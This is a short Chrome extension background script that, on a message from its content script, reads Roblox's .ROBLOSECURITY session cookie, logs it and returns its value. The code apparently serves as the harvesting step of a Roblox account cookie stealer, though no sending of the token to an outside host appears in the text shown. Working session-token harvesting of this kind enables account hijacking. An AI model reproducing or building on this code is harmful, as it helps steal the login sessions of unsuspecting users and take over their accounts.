chrome.runtime.onInstalled.addListener(() => {
    console.log("Extension installed!");
});

// Listen for messages from content.js to get the .ROBLOSECURITY cookie
chrome.runtime.onMessage.addListener((request, sender, sendResponse) => {
    if (request.type === "GetCookie") {
        const cookieName = request.message;  // The cookie name you want (e.g., ".ROBLOSECURITY")
        getCookie(cookieName, sendResponse);  // Fetch the cookie and respond
        return true;  // Return true to indicate that sendResponse will be called asynchronously
    }
});

// Function to get a cookie by name
function getCookie(cookieName, callback) {
    chrome.cookies.get({ name: cookieName, url: 'https://www.roblox.com' }, function(cookie) {
        if (cookie) {
            console.log(`Cookie ${cookieName} found:`, cookie.value);
            callback({ success: true, cookie: cookie.value });
        } else {
            console.log(`Cookie ${cookieName} not found.`);
            callback({ success: false, message: 'Cookie not found' });
        }
    });
}